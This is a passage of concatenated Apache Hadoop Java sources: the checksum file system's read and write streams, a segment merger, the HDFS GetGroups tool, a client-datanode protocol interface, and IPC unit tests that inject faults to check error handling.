public ChecksumFSInputChecker(ChecksumFileSystem fs, Path file)
throws IOException {
this(fs, file, fs.getConf().getInt("io.file.buffer.size", 4096));
}
public ChecksumFSInputChecker(ChecksumFileSystem fs, Path file, int bufferSize)
throws IOException {
super( file, fs.getFileStatus(file).getReplication() );
this.datas = fs.getRawFileSystem().open(file, bufferSize);
this.fs = fs;
Path sumFile = fs.getChecksumFile(file);
try {
int sumBufferSize = fs.getSumBufferSize(fs.getBytesPerSum(), bufferSize);
sums = fs.getRawFileSystem().open(sumFile, sumBufferSize);
byte[] version = new byte[CHECKSUM_VERSION.length];
sums.readFully(version);
if (!Arrays.equals(version, CHECKSUM_VERSION))
throw new IOException("Not a checksum file: "+sumFile);
this.bytesPerSum = sums.readInt();
set(fs.verifyChecksum, new PureJavaCrc32(), bytesPerSum, 4);
} catch (FileNotFoundException e) { // quietly ignore
set(fs.verifyChecksum, null, 1, 0);
} catch (IOException e) { // loudly ignore
LOG.warn("Problem opening checksum file: "+ file +
". Ignoring exception: " +
StringUtils.stringifyException(e));
set(fs.verifyChecksum, null, 1, 0);
}
}
private long getChecksumFilePos( long dataPos ) {
return HEADER_LENGTH + 4*(dataPos/bytesPerSum);
}
protected long getChunkPosition( long dataPos ) {
return dataPos/bytesPerSum*bytesPerSum;
}
public int available() throws IOException {
return datas.available() + super.available();
}
public int read(long position, byte[] b, int off, int len)
throws IOException {
// parameter check
if ((off | len | (off + len) | (b.length - (off + len))) < 0) {
throw new IndexOutOfBoundsException();
} else if (len == 0) {
return 0;
}
if( position<0 ) {
throw new IllegalArgumentException(
"Parameter position can not to be negative");
}
ChecksumFSInputChecker checker = new ChecksumFSInputChecker(fs, file);
checker.seek(position);
int nread = checker.read(b, off, len);
checker.close();
return nread;
}
public void close() throws IOException {
datas.close();
if( sums != null ) {
sums.close();
}
set(fs.verifyChecksum, null, 1, 0);
}
@Override
public boolean seekToNewSource(long targetPos) throws IOException {
long sumsPos = getChecksumFilePos(targetPos);
fs.reportChecksumFailure(file, datas, targetPos, sums, sumsPos);
boolean newDataSource = datas.seekToNewSource(targetPos);
return sums.seekToNewSource(sumsPos) || newDataSource;
}
@Override
protected int readChunk(long pos, byte[] buf, int offset, int len,
byte[] checksum) throws IOException {
boolean eof = false;
if(needChecksum()) {
try {
long checksumPos = getChecksumFilePos(pos);
if(checksumPos != sums.getPos()) {
sums.seek(checksumPos);
}
sums.readFully(checksum);
} catch (EOFException e) {
eof = true;
}
len = bytesPerSum;
}
if(pos != datas.getPos()) {
datas.seek(pos);
}
int nread = readFully(datas, buf, offset, len);
if( eof && nread > 0) {
throw new ChecksumException("Checksum error: "+file+" at "+pos, pos);
}
return nread;
}
/* Return the file length */
private long getFileLength() throws IOException {
if( fileLen==-1L ) {
fileLen = fs.getContentSummary(file).getLength();
}
return fileLen;
}
/**
* Skips over and discards <code>n</code> bytes of data from the
* input stream.
*
*The <code>skip</code> method skips over some smaller number of bytes
* when reaching end of file before <code>n</code> bytes have been skipped.
* The actual number of bytes skipped is returned. If <code>n</code> is
* negative, no bytes are skipped.
*
* @param n the number of bytes to be skipped.
* @return the actual number of bytes skipped.
* @exception IOException if an I/O error occurs.
* ChecksumException if the chunk to skip to is corrupted
*/
public synchronized long skip(long n) throws IOException {
long curPos = getPos();
long fileLength = getFileLength();
if( n+curPos > fileLength ) {
n = fileLength - curPos;
}
return super.skip(n);
}
/**
* Seek to the given position in the stream.
* The next read() will be from that position.
*
* <p>This method does not allow seek past the end of the file.
* This produces IOException.
*
* @param pos the postion to seek to.
* @exception IOException if an I/O error occurs or seeks after EOF
* ChecksumException if the chunk to seek to is corrupted
*/
public synchronized void seek(long pos) throws IOException {
if(pos>getFileLength()) {
throw new IOException("Cannot seek after EOF");
}
super.seek(pos);
}
}
/**
* Opens an FSDataInputStream at the indicated Path.
* @param f the file name to open
* @param bufferSize the size of the buffer to be used.
*/
@Override
public FSDataInputStream open(Path f, int bufferSize) throws IOException {
return new FSDataInputStream(
new ChecksumFSInputChecker(this, f, bufferSize));
}
/** {@inheritDoc} */
public FSDataOutputStream append(Path f, int bufferSize,
Progressable progress) throws IOException {
throw new IOException("Not supported");
}
/**
* Calculated the length of the checksum file in bytes.
* @param size the length of the data file in bytes
* @param bytesPerSum the number of bytes in a checksum block
* @return the number of bytes in the checksum file
*/
public static long getChecksumLength(long size, int bytesPerSum) {
//the checksum length is equal to size passed divided by bytesPerSum +
//bytes written in the beginning of the checksum file.
return ((size + bytesPerSum - 1) / bytesPerSum) * 4 +
CHECKSUM_VERSION.length + 4;
}
/** This class provides an output stream for a checksummed file.
* It generates checksums for data. */
private static class ChecksumFSOutputSummer extends FSOutputSummer {
private FSDataOutputStream datas;
private FSDataOutputStream sums;
private static final float CHKSUM_AS_FRACTION = 0.01f;
public ChecksumFSOutputSummer(ChecksumFileSystem fs,
Path file,
boolean overwrite,
short replication,
long blockSize,
Configuration conf)
throws IOException {
this(fs, file, overwrite,
conf.getInt("io.file.buffer.size", 4096),
replication, blockSize, null);
}
public ChecksumFSOutputSummer(ChecksumFileSystem fs,
Path file,
boolean overwrite,
int bufferSize,
short replication,
long blockSize,
Progressable progress)
throws IOException {
super(new PureJavaCrc32(), fs.getBytesPerSum(), 4);
int bytesPerSum = fs.getBytesPerSum();
this.datas = fs.getRawFileSystem().create(file, overwrite, bufferSize,
replication, blockSize, progress);
int sumBufferSize = fs.getSumBufferSize(bytesPerSum, bufferSize);
this.sums = fs.getRawFileSystem().create(fs.getChecksumFile(file), true,
sumBufferSize, replication,
blockSize);
sums.write(CHECKSUM_VERSION, 0, CHECKSUM_VERSION.length);
sums.writeInt(bytesPerSum);
}
public void close() throws IOException {
flushBuffer();
sums.close();
datas.close();
}
@Override
protected void writeChunk(byte[] b, int offset, int len, byte[] checksum)
throws IOException {
datas.write(b, offset, len);
sums.write(checksum);
}
}
/** {@inheritDoc} */
@Override
public FSDataOutputStream create(Path f, FsPermission permission,
boolean overwrite, int bufferSize, short replication, long blockSize,
Progressable progress) throws IOException {
return create(f, permission, overwrite, true, bufferSize,
replication, blockSize, progress);
}
private FSDataOutputStream create(Path f, FsPermission permission,
boolean overwrite, boolean createParent, int bufferSize,
short replication, long blockSize,
Progressable progress) throws IOException {
Path parent = f.getParent();
if (parent != null) {
if (!createParent && !exists(parent)) {
throw new FileNotFoundException("Parent directory doesn't exist: "
+ parent);
} else if (!mkdirs(parent)) {
throw new IOException("Mkdirs failed to create " + parent);
}
}
final FSDataOutputStream out = new FSDataOutputStream(
new ChecksumFSOutputSummer(this, f, overwrite, bufferSize, replication,
blockSize, progress), null);
if (permission != null) {
setPermission(f, permission);
}
return out;
}
/** {@inheritDoc} */
@Override
public FSDataOutputStream createNonRecursive(Path f, FsPermission permission,
boolean overwrite, int bufferSize, short replication, long blockSize,
Progressable progress) throws IOException {
return create(f, permission, overwrite, false, bufferSize, replication,
blockSize, progress);
}
/**
* Set replication for an existing file.
* Implement the abstract <tt>setReplication</tt> of <tt>FileSystem</tt>
* @param src file name
* @param replication new replication
* @throws IOException
* @return true if successful;
* false if file does not exist or is a directory
*/
public boolean setReplication(Path src, short replication) throws IOException {
boolean value = fs.setReplication(src, replication);
if (!value)
return false;
Path checkFile = getChecksumFile(src);
if (exists(checkFile))
fs.setReplication(checkFile, replication);
return true;
}
/**
* Rename files/dirs
*/
public boolean rename(Path src, Path dst) throws IOException {
if (fs.isDirectory(src)) {
return fs.rename(src, dst);
} else {
boolean value = fs.rename(src, dst);
if (!value)
return false;
Path checkFile = getChecksumFile(src);
if (fs.exists(checkFile)) { //try to rename checksum
if (fs.isDirectory(dst)) {
value = fs.rename(checkFile, dst);
} else {
value = fs.rename(checkFile, getChecksumFile(dst));
}
}
return value;
}
}
/**
* Implement the delete(Path, boolean) in checksum
* file system.
*/
public boolean delete(Path f, boolean recursive) throws IOException{
FileStatus fstatus = null;
try {
fstatus = fs.getFileStatus(f);
} catch(FileNotFoundException e) {
return false;
}
if(fstatus.isDir()) {
//this works since the crcs are in the same
//directories and the files. so we just delete
//everything in the underlying filesystem
return fs.delete(f, recursive);
} else {
Path checkFile = getChecksumFile(f);
if (fs.exists(checkFile)) {
fs.delete(checkFile, true);
}
return fs.delete(f, true);
}
}
final private static PathFilter DEFAULT_FILTER = new PathFilter() {
public boolean accept(Path file) {
return !isChecksumFile(file);
}
};
/**
* List the statuses of the files/directories in the given path if the path is
* a directory.
*
* @param f
* given path
* @return the statuses of the files/directories in the given patch
* @throws IOException
*/
@Override
public FileStatus[] listStatus(Path f) throws IOException {
return fs.listStatus(f, DEFAULT_FILTER);
}
@Override
public boolean mkdirs(Path f) throws IOException {
return fs.mkdirs(f);
}
@Override
public void copyFromLocalFile(boolean delSrc, Path src, Path dst)
throws IOException {
Configuration conf = getConf();
FileUtil.copy(getLocal(conf), src, this, dst, delSrc, conf);
}
/**
* The src file is under FS, and the dst is on the local disk.
* Copy it from FS control to the local dst name.
*/
@Override
public void copyToLocalFile(boolean delSrc, Path src, Path dst)
throws IOException {
Configuration conf = getConf();
FileUtil.copy(this, src, getLocal(conf), dst, delSrc, conf);
}
/**
* The src file is under FS, and the dst is on the local disk.
* Copy it from FS control to the local dst name.
* If src and dst are directories, the copyCrc parameter
* determines whether to copy CRC files.
*/
public void copyToLocalFile(Path src, Path dst, boolean copyCrc)
throws IOException {
if (!fs.isDirectory(src)) { // source is a file
fs.copyToLocalFile(src, dst);
FileSystem localFs = getLocal(getConf()).getRawFileSystem();
if (localFs.isDirectory(dst)) {
dst = new Path(dst, src.getName());
}
dst = getChecksumFile(dst);
if (localFs.exists(dst)) { //remove old local checksum file
localFs.delete(dst, true);
}
Path checksumFile = getChecksumFile(src);
if (copyCrc && fs.exists(checksumFile)) { //copy checksum file
fs.copyToLocalFile(checksumFile, dst);
}
} else {
FileStatus[] srcs = listStatus(src);
for (FileStatus srcFile : srcs) {
copyToLocalFile(srcFile.getPath(),
new Path(dst, srcFile.getPath().getName()), copyCrc);
}
}
}
@Override
public Path startLocalOutput(Path fsOutputFile, Path tmpLocalFile)
throws IOException {
return tmpLocalFile;
}
@Override
public void completeLocalOutput(Path fsOutputFile, Path tmpLocalFile)
throws IOException {
moveFromLocalFile(tmpLocalFile, fsOutputFile);
}
/**
* Report a checksum error to the file system.
* @param f the file name containing the error
* @param in the stream open on the file
* @param inPos the position of the beginning of the bad data in the file
* @param sums the stream open on the checksum file
* @param sumsPos the position of the beginning of the bad data in the checksum file
* @return if retry is neccessary
*/
public boolean reportChecksumFailure(Path f, FSDataInputStream in,
long inPos, FSDataInputStream sums, long sumsPos) {
return false;
}
}
<|start_filename|>src/mapred/org/apache/hadoop/mapred/ConcatenateMerger.java<|end_filename|>
package org.apache.hadoop.mapred;
import java.io.IOException;
import java.util.List;
import org.apache.commons.logging.Log;
import org.apache.commons.logging.LogFactory;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.mapred.IFile.IStreamWriter;
import org.apache.hadoop.util.Progressable;
public class ConcatenateMerger<K, V>
{
private static final Log LOG = LogFactory.getLog(ConcatenateMerger.class);
public static <K extends Object, V extends Object> void writeFile(IStreamWriter writer,
List<Segment<K, V>> segments, Progressable progressable, Counters.Counter readsCounter,
Configuration conf) throws IOException
{
if (LOG.isDebugEnabled())
{
StringBuilder sb = new StringBuilder();
sb.append(" Merging " + segments.size() + " files :[");
for (Segment<K, V> segment : segments)
{
sb.append(" Compressed Length: " + segment.getLength() + ","
+ "Uncompressed Lenghth :" + segment.getRawLen() + ";");
}
sb.append("]");
LOG.debug(sb.toString());
}
for (int i = 0; i < segments.size(); i++)
{
Segment<K, V> segment = segments.get(i);
segment.init(readsCounter);
segment.writeTo(writer, progressable, conf);
segment.close();
}
}
}
<|start_filename|>src/hdfs/org/apache/hadoop/hdfs/tools/GetGroups.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.hdfs.tools;
import java.io.IOException;
import java.io.PrintStream;
import java.net.InetSocketAddress;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.hdfs.server.namenode.NameNode;
import org.apache.hadoop.tools.GetGroupsBase;
import org.apache.hadoop.util.ToolRunner;
/**
* HDFS implementation of a tool for getting the groups which a given user
* belongs to.
*/
public class GetGroups extends GetGroupsBase {
static {
Configuration.addDefaultResource("hdfs-default.xml");
Configuration.addDefaultResource("hdfs-site.xml");
}
GetGroups(Configuration conf) {
super(conf);
}
GetGroups(Configuration conf, PrintStream out) {
super(conf, out);
}
@Override
protected InetSocketAddress getProtocolAddress(Configuration conf)
throws IOException {
return NameNode.getAddress(conf);
}
public static void main(String[] argv) throws Exception {
int res = ToolRunner.run(new GetGroups(new Configuration()), argv);
System.exit(res);
}
}
<|start_filename|>src/hdfs/org/apache/hadoop/hdfs/protocol/ClientDatanodeProtocol.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.hdfs.protocol;
import java.io.IOException;
import org.apache.commons.logging.Log;
import org.apache.commons.logging.LogFactory;
import org.apache.hadoop.hdfs.DFSConfigKeys;
import org.apache.hadoop.hdfs.security.token.block.BlockTokenIdentifier;
import org.apache.hadoop.hdfs.security.token.block.BlockTokenSelector;
import org.apache.hadoop.ipc.VersionedProtocol;
import org.apache.hadoop.security.KerberosInfo;
import org.apache.hadoop.security.token.Token;
import org.apache.hadoop.security.token.TokenInfo;
/** An client-datanode protocol for block recovery
*/
@KerberosInfo(
serverPrincipal = DFSConfigKeys.DFS_DATANODE_USER_NAME_KEY)
@TokenInfo(BlockTokenSelector.class)
public interface ClientDatanodeProtocol extends VersionedProtocol {
public static final Log LOG = LogFactory.getLog(ClientDatanodeProtocol.class);
/**
* 4: added getBlockInfo
* 5: never return null and always return a newly generated access token
*/
public static final long versionID = 5L;
/** Start generation-stamp recovery for specified block
* @param block the specified block
* @param keepLength keep the block length
* @param targets the list of possible locations of specified block
* @return either a new generation stamp, or the original generation stamp.
* Regardless of whether a new generation stamp is returned, a newly
* generated access token is returned as part of the return value.
* @throws IOException
*/
LocatedBlock recoverBlock(Block block, boolean keepLength,
DatanodeInfo[] targets) throws IOException;
/** Returns a block object that contains the specified block object
* from the specified Datanode.
* @param block the specified block
* @return the Block object from the specified Datanode
* @throws IOException if the block does not exist
*/
Block getBlockInfo(Block block) throws IOException;
/**
* Retrieves the path names of the block file and metadata file stored on the
* local file system.
*
* In order for this method to work, one of the following should be satisfied:
* <ul>
* <li>
* The client user must be configured at the datanode to be able to use this
* method.</li>
* <li>
* When security is enabled, kerberos authentication must be used to connect
* to the datanode.</li>
* </ul>
*
* @param block
* the specified block on the local datanode
* @param token
* the block access token.
* @return the BlockLocalPathInfo of a block
* @throws IOException
* on error
*/
BlockLocalPathInfo getBlockLocalPathInfo(Block block,
Token<BlockTokenIdentifier> token) throws IOException;
}
<|start_filename|>src/test/org/apache/hadoop/ipc/TestIPC.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.ipc;
import org.apache.commons.logging.*;
import org.apache.hadoop.io.Writable;
import org.apache.hadoop.io.LongWritable;
import org.apache.hadoop.util.StringUtils;
import org.apache.hadoop.net.NetUtils;
import java.util.Random;
import java.io.DataInput;
import java.io.DataOutput;
import java.io.IOException;
import java.net.InetSocketAddress;
import java.net.SocketTimeoutException;
import java.net.Socket;
import javax.net.SocketFactory;
import org.junit.Test;
import org.mockito.Mockito;
import org.mockito.invocation.InvocationOnMock;
import org.mockito.stubbing.Answer;
import static org.junit.Assert.*;
import static org.mockito.Mockito.*;
import org.apache.hadoop.conf.Configuration;
/** Unit tests for IPC. */
public class TestIPC {
public static final Log LOG =
LogFactory.getLog(TestIPC.class);
final private static Configuration conf = new Configuration();
final static private int PING_INTERVAL = 1000;
final static private int MIN_SLEEP_TIME = 1000;
/**
* Flag used to turn off the fault injection behavior
* of the various writables.
**/
static boolean WRITABLE_FAULTS_ENABLED = true;
static int WRITABLE_FAULTS_SLEEP = 0;
static {
Client.setPingInterval(conf, PING_INTERVAL);
}
private static final Random RANDOM = new Random();
private static final String ADDRESS = "0.0.0.0";
private static class TestServer extends Server {
private boolean sleep;
private Class<? extends Writable> responseClass;
public TestServer(int handlerCount, boolean sleep) throws IOException {
this(handlerCount, sleep, LongWritable.class, null);
}
public TestServer(int handlerCount, boolean sleep,
Class<? extends Writable> paramClass,
Class<? extends Writable> responseClass)
throws IOException {
super(ADDRESS, 0, paramClass, handlerCount, conf);
this.sleep = sleep;
this.responseClass = responseClass;
}
@Override
public Writable call(Class<?> protocol, Writable param, long receiveTime)
throws IOException {
if (sleep) {
try {
Thread.sleep(RANDOM.nextInt(PING_INTERVAL) + MIN_SLEEP_TIME); // sleep a bit
} catch (InterruptedException e) {}
}
if (responseClass != null) {
try {
return responseClass.newInstance();
} catch (Exception e) {
throw new RuntimeException(e);
}
} else {
return param; // echo param as result
}
}
}
private static class SerialCaller extends Thread {
private Client client;
private InetSocketAddress server;
private int count;
private boolean failed;
public SerialCaller(Client client, InetSocketAddress server, int count) {
this.client = client;
this.server = server;
this.count = count;
}
public void run() {
for (int i = 0; i < count; i++) {
try {
LongWritable param = new LongWritable(RANDOM.nextLong());
LongWritable value =
(LongWritable)client.call(param, server, null, null, 0);
if (!param.equals(value)) {
LOG.fatal("Call failed!");
failed = true;
break;
}
} catch (Exception e) {
LOG.fatal("Caught: " + StringUtils.stringifyException(e));
failed = true;
}
}
}
}
private static class ParallelCaller extends Thread {
private Client client;
private int count;
private InetSocketAddress[] addresses;
private boolean failed;
public ParallelCaller(Client client, InetSocketAddress[] addresses,
int count) {
this.client = client;
this.addresses = addresses;
this.count = count;
}
public void run() {
for (int i = 0; i < count; i++) {
try {
Writable[] params = new Writable[addresses.length];
for (int j = 0; j < addresses.length; j++)
params[j] = new LongWritable(RANDOM.nextLong());
Writable[] values = client.call(params, addresses, null, null, conf);
for (int j = 0; j < addresses.length; j++) {
if (!params[j].equals(values[j])) {
LOG.fatal("Call failed!");
failed = true;
break;
}
}
} catch (Exception e) {
LOG.fatal("Caught: " + StringUtils.stringifyException(e));
failed = true;
}
}
}
}
@Test
public void testSerial() throws Exception {
testSerial(3, false, 2, 5, 100);
testSerial(3, true, 2, 5, 10);
}
public void testSerial(int handlerCount, boolean handlerSleep,
int clientCount, int callerCount, int callCount)
throws Exception {
Server server = new TestServer(handlerCount, handlerSleep);
InetSocketAddress addr = NetUtils.getConnectAddress(server);
server.start();
Client[] clients = new Client[clientCount];
for (int i = 0; i < clientCount; i++) {
clients[i] = new Client(LongWritable.class, conf);
}
SerialCaller[] callers = new SerialCaller[callerCount];
for (int i = 0; i < callerCount; i++) {
callers[i] = new SerialCaller(clients[i%clientCount], addr, callCount);
callers[i].start();
}
for (int i = 0; i < callerCount; i++) {
callers[i].join();
assertFalse(callers[i].failed);
}
for (int i = 0; i < clientCount; i++) {
clients[i].stop();
}
server.stop();
}
@Test
public void testParallel() throws Exception {
testParallel(10, false, 2, 4, 2, 4, 100);
}
public void testParallel(int handlerCount, boolean handlerSleep,
int serverCount, int addressCount,
int clientCount, int callerCount, int callCount)
throws Exception {
Server[] servers = new Server[serverCount];
for (int i = 0; i < serverCount; i++) {
servers[i] = new TestServer(handlerCount, handlerSleep);
servers[i].start();
}
InetSocketAddress[] addresses = new InetSocketAddress[addressCount];
for (int i = 0; i < addressCount; i++) {
addresses[i] = NetUtils.getConnectAddress(servers[i%serverCount]);
}
Client[] clients = new Client[clientCount];
for (int i = 0; i < clientCount; i++) {
clients[i] = new Client(LongWritable.class, conf);
}
ParallelCaller[] callers = new ParallelCaller[callerCount];
for (int i = 0; i < callerCount; i++) {
callers[i] =
new ParallelCaller(clients[i%clientCount], addresses, callCount);
callers[i].start();
}
for (int i = 0; i < callerCount; i++) {
callers[i].join();
assertFalse(callers[i].failed);
}
for (int i = 0; i < clientCount; i++) {
clients[i].stop();
}
for (int i = 0; i < serverCount; i++) {
servers[i].stop();
}
}
@Test
public void testStandAloneClient() throws Exception {
testParallel(10, false, 2, 4, 2, 4, 100);
Client client = new Client(LongWritable.class, conf);
InetSocketAddress address = new InetSocketAddress("127.0.0.1", 10);
try {
client.call(new LongWritable(RANDOM.nextLong()),
address, null, null, 0, conf);
fail("Expected an exception to have been thrown");
} catch (IOException e) {
String message = e.getMessage();
String addressText = address.toString();
assertTrue("Did not find "+addressText+" in "+message,
message.contains(addressText));
Throwable cause=e.getCause();
assertNotNull("No nested exception in "+e,cause);
String causeText=cause.getMessage();
assertTrue("Did not find " + causeText + " in " + message,
message.contains(causeText));
}
}
static void maybeThrowIOE() throws IOException {
if (WRITABLE_FAULTS_ENABLED) {
maybeSleep();
throw new IOException("Injected fault");
}
}
static void maybeThrowRTE() {
if (WRITABLE_FAULTS_ENABLED) {
maybeSleep();
throw new RuntimeException("Injected fault");
}
}
private static void maybeSleep() {
if (WRITABLE_FAULTS_SLEEP > 0) {
try {
Thread.sleep(WRITABLE_FAULTS_SLEEP);
} catch (InterruptedException ie) {
}
}
}
@SuppressWarnings("unused")
private static class IOEOnReadWritable extends LongWritable {
public IOEOnReadWritable() {}
public void readFields(DataInput in) throws IOException {
super.readFields(in);
maybeThrowIOE();
}
}
@SuppressWarnings("unused")
private static class RTEOnReadWritable extends LongWritable {
public RTEOnReadWritable() {}
public void readFields(DataInput in) throws IOException {
super.readFields(in);
maybeThrowRTE();
}
}
@SuppressWarnings("unused")
private static class IOEOnWriteWritable extends LongWritable {
public IOEOnWriteWritable() {}
@Override
public void write(DataOutput out) throws IOException {
super.write(out);
maybeThrowIOE();
}
}
@SuppressWarnings("unused")
private static class RTEOnWriteWritable extends LongWritable {
public RTEOnWriteWritable() {}
@Override
public void write(DataOutput out) throws IOException {
super.write(out);
maybeThrowRTE();
}
}
/**
* Generic test case for exceptions thrown at some point in the IPC
* process.
*
* @param clientParamClass - client writes this writable for parameter
* @param serverParamClass - server reads this writable for parameter
* @param serverResponseClass - server writes this writable for response
* @param clientResponseClass - client reads this writable for response
*/
private void doErrorTest(
Class<? extends LongWritable> clientParamClass,
Class<? extends LongWritable> serverParamClass,
Class<? extends LongWritable> serverResponseClass,
Class<? extends LongWritable> clientResponseClass) throws Exception {
// start server
Server server = new TestServer(1, false,
serverParamClass, serverResponseClass);
InetSocketAddress addr = NetUtils.getConnectAddress(server);
server.start();
// start client
WRITABLE_FAULTS_ENABLED = true;
Client client = new Client(clientResponseClass, conf);
try {
LongWritable param = clientParamClass.newInstance();
try {
client.call(param, addr, null, null, 0, conf);
fail("Expected an exception to have been thrown");
} catch (Throwable t) {
assertExceptionContains(t, "Injected fault");
}
// Doing a second call with faults disabled should return fine --
// ie the internal state of the client or server should not be broken
// by the failed call
WRITABLE_FAULTS_ENABLED = false;
client.call(param, addr, null, null, 0, conf);
} finally {
server.stop();
}
}
@Test
public void testIOEOnClientWriteParam() throws Exception {
doErrorTest(IOEOnWriteWritable.class,
LongWritable.class,
LongWritable.class,
LongWritable.class);
}
@Test
public void testRTEOnClientWriteParam() throws Exception {
doErrorTest(RTEOnWriteWritable.class,
LongWritable.class,
LongWritable.class,
LongWritable.class);
}
@Test
public void testIOEOnServerReadParam() throws Exception {
doErrorTest(LongWritable.class,
IOEOnReadWritable.class,
LongWritable.class,
LongWritable.class);
}
@Test
public void testRTEOnServerReadParam() throws Exception {
doErrorTest(LongWritable.class,
RTEOnReadWritable.class,
LongWritable.class,
LongWritable.class);
}
@Test
public void testIOEOnServerWriteResponse() throws Exception {
doErrorTest(LongWritable.class,
LongWritable.class,
IOEOnWriteWritable.class,
LongWritable.class);
}
@Test
public void testRTEOnServerWriteResponse() throws Exception {
doErrorTest(LongWritable.class,
LongWritable.class,
RTEOnWriteWritable.class,
LongWritable.class);
}
@Test
public void testIOEOnClientReadResponse() throws Exception {
doErrorTest(LongWritable.class,
LongWritable.class,
LongWritable.class,
IOEOnReadWritable.class);
}
@Test
public void testRTEOnClientReadResponse() throws Exception {
doErrorTest(LongWritable.class,
LongWritable.class,
LongWritable.class,
RTEOnReadWritable.class);
}
/**
* Test case that fails a write, but only after taking enough time
* that a ping should have been sent. This is a reproducer for a
* deadlock seen in one iteration of HADOOP-6762.
*/
@Test
public void testIOEOnWriteAfterPingClient() throws Exception {
// start server
Client.setPingInterval(conf, 100);
try {
WRITABLE_FAULTS_SLEEP = 1000;
doErrorTest(IOEOnWriteWritable.class,
LongWritable.class,
LongWritable.class,
LongWritable.class);
} finally {
WRITABLE_FAULTS_SLEEP = 0;
}
}
private static void assertExceptionContains(
Throwable t, String substring) {
String msg = StringUtils.stringifyException(t);
assertTrue("Exception should contain substring '" + substring + "':\n" +
msg, msg.contains(substring));
LOG.info("Got expected exception", t);
}
/**
* Test that, if the socket factory throws an IOE, it properly propagates
* to the client.
*/
@Test
public void testSocketFactoryException() throws Exception {
SocketFactory mockFactory = mock(SocketFactory.class);
doThrow(new IOException("Injected fault")).when(mockFactory).createSocket();
Client client = new Client(LongWritable.class, conf, mockFactory);
InetSocketAddress address = new InetSocketAddress("127.0.0.1", 10);
try {
client.call(new LongWritable(RANDOM.nextLong()),
address, null, null, 0);
fail("Expected an exception to have been thrown");
} catch (IOException e) {
assertTrue(e.getMessage().contains("Injected fault"));
}
}
/**
* Test that, if a RuntimeException is thrown after creating a socket
* but before successfully connecting to the IPC server, that the
* failure is handled properly. This is a regression test for
* HADOOP-7428.
*/
@Test
public void testRTEDuringConnectionSetup() throws Exception {
// Set up a socket factory which returns sockets which
// throw an RTE when setSoTimeout is called.
SocketFactory spyFactory = spy(NetUtils.getDefaultSocketFactory(conf));
Mockito.doAnswer(new Answer<Socket>() {
@Override
public Socket answer(InvocationOnMock invocation) throws Throwable {
Socket s = spy((Socket)invocation.callRealMethod());
doThrow(new RuntimeException("Injected fault")).when(s)
.setSoTimeout(anyInt());
return s;
}
}).when(spyFactory).createSocket();
Server server = new TestServer(1, true);
server.start();
try {
// Call should fail due to injected exception.
InetSocketAddress address = NetUtils.getConnectAddress(server);
Client client = new Client(LongWritable.class, conf, spyFactory);
try {
client.call(new LongWritable(RANDOM.nextLong()),
address, null, null, 0, conf);
fail("Expected an exception to have been thrown");
} catch (Exception e) {
LOG.info("caught expected exception", e);
assertTrue(StringUtils.stringifyException(e).contains(
"Injected fault"));
}
// Resetting to the normal socket behavior should succeed
// (i.e. it should not have cached a half-constructed connection)
Mockito.reset(spyFactory);
client.call(new LongWritable(RANDOM.nextLong()),
address, null, null, 0, conf);
} finally {
server.stop();
}
}
@Test
public void testIpcTimeout() throws Exception {
// start server
Server server = new TestServer(1, true);
InetSocketAddress addr = NetUtils.getConnectAddress(server);
server.start();
// start client
Client client = new Client(LongWritable.class, conf);
// set timeout to be less than MIN_SLEEP_TIME
try {
client.call(new LongWritable(RANDOM.nextLong()),
addr, null, null, MIN_SLEEP_TIME/2);
fail("Expected an exception to have been thrown");
} catch (SocketTimeoutException e) {
LOG.info("Get a SocketTimeoutException ", e);
}
// set timeout to be bigger than 3*ping interval
client.call(new LongWritable(RANDOM.nextLong()),
addr, null, null, 3*PING_INTERVAL+MIN_SLEEP_TIME);
}
public static void main(String[] args) throws Exception {
//new TestIPC().testSerial(5, false, 2, 10, 1000);
new TestIPC().testParallel(10, false, 2, 4, 2, 4, 1000);
}
}
<|start_filename|>src/hdfs/org/apache/hadoop/hdfs/server/namenode/ContentSummaryServlet.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.hdfs.server.namenode;
import java.io.IOException;
import java.io.PrintWriter;
import java.security.PrivilegedExceptionAction;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.fs.ContentSummary;
